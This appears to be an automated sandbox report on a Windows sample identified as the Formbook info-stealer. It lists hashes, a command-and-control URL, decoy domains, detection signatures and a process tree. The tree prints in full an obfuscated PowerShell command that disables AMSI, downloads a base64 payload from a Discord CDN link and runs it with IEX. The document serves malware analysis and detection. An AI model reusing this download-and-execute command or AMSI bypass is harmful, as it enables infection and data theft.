Overview

overview

10

Static

static

06daa4f472...76.exe

windows7_x64

10

06daa4f472...76.exe

windows10_x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    23-07-2021 18:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    06daa4f472383226392964c70e34c376.exe

  • Size

    65KB

  • MD5

    06daa4f472383226392964c70e34c376

  • SHA1

    b47a3554b0bf7250caa0f84090fb387cb332f31b

  • SHA256

    51c392870e9f21df2154b4e68a901ca1b5d9fccdcf00a4e6fa60ef07b4dfc541

  • SHA512

    9f220bc3f4c097d582f2958e57255e862f1b67191c6409ea0199a1c9ce3bd57830f7d9cd86c38925b7c61d744a77cbd51d2b59ffee9f66d57e0ee2a4ab654dee

Score
10/10
formbookratspywarestealersuricatatrojan

Malware Config

Extracted

Family

formbook

Version

4.1

C2

http://www.howmucharemyrarecoinsworth.com/jn7g/

Decoy

mojketering.com

signinsimple.com

theartclouds.com

xmartmanagement.com

akademisantri.com

knitsu.com

funeralhomeswarrensburgil.com

formatohd.xyz

ortetiles.com

myeduhubs.com

twinpiques.com

itpaystobefashionable.com

3drinkminimum.com

wanpoo1.com

crystalclearlifecoachingcc.com

dronerealestate.net

langers.email

konstela.com

enteratecondanielvelasquez.com

graceinhomeschoolchaos.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

    trojanspywarestealerformbook
  • suricata: ET MALWARE FormBook CnC Checkin (GET)
    suricata
  • Formbook Payload 3 IoCs
    rat
  • Blocklisted process makes network request 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 35 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1352
    • C:\Users\Admin\AppData\Local\Temp\06daa4f472383226392964c70e34c376.exe
      "C:\Users\Admin\AppData\Local\Temp\06daa4f472383226392964c70e34c376.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1096
      • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
        Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$76545677866555677886556778657=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,56,53,56,55,57,51,51,50,50,48,56,55,55,49,48,55,53,51,47,56,54,51,56,57,56,49,51,54,56,53,52,48,48,51,55,50,50,47,109,101,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($76545677866555677886556778657)|I`E`X
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2028
        • C:\WINDOWS\syswow64\calc.exe
          "{path}"
          4⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          PID:592
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1800
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\WINDOWS\syswow64\calc.exe"
        3⤵
          PID:2000

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/592-72-0x0000000000400000-0x000000000042E000-memory.dmp
      Filesize

      184KB

      Download
    • memory/592-74-0x0000000000830000-0x0000000000B33000-memory.dmp
      Filesize

      3.0MB

      Download
    • memory/592-75-0x0000000000180000-0x0000000000194000-memory.dmp
      Filesize

      80KB

      Download
    • memory/592-73-0x000000000041EBD0-mapping.dmp
      Download
    • memory/1352-84-0x0000000004960000-0x0000000004A00000-memory.dmp
      Filesize

      640KB

      Download
    • memory/1352-76-0x0000000006B40000-0x0000000006C59000-memory.dmp
      Filesize

      1.1MB

      Download
    • memory/1800-78-0x0000000075DA1000-0x0000000075DA3000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1800-77-0x0000000000000000-mapping.dmp
      Download
    • memory/1800-83-0x0000000001F50000-0x0000000001FE3000-memory.dmp
      Filesize

      588KB

      Download
    • memory/1800-82-0x0000000002220000-0x0000000002523000-memory.dmp
      Filesize

      3.0MB

      Download
    • memory/1800-80-0x00000000000F0000-0x000000000011E000-memory.dmp
      Filesize

      184KB

      Download
    • memory/1800-79-0x00000000000A0000-0x00000000000B4000-memory.dmp
      Filesize

      80KB

      Download
    • memory/2000-81-0x0000000000000000-mapping.dmp
      Download
    • memory/2028-71-0x000000001C560000-0x000000001C5BA000-memory.dmp
      Filesize

      360KB

      Download
    • memory/2028-64-0x00000000025E0000-0x00000000025E1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2028-63-0x000000001AD70000-0x000000001AD71000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2028-62-0x0000000002290000-0x0000000002291000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2028-65-0x000000001ACF0000-0x000000001ACF2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2028-60-0x0000000000000000-mapping.dmp
      Download
    • memory/2028-66-0x000000001ACF4000-0x000000001ACF6000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2028-67-0x0000000001F20000-0x0000000001F21000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2028-70-0x000000001ACFA000-0x000000001AD19000-memory.dmp
      Filesize

      124KB

      Download
    • memory/2028-69-0x000000001B620000-0x000000001B621000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2028-68-0x000000001AB30000-0x000000001AB31000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2028-61-0x000007FEFC1D1000-0x000007FEFC1D3000-memory.dmp
      Filesize

      8KB

      Download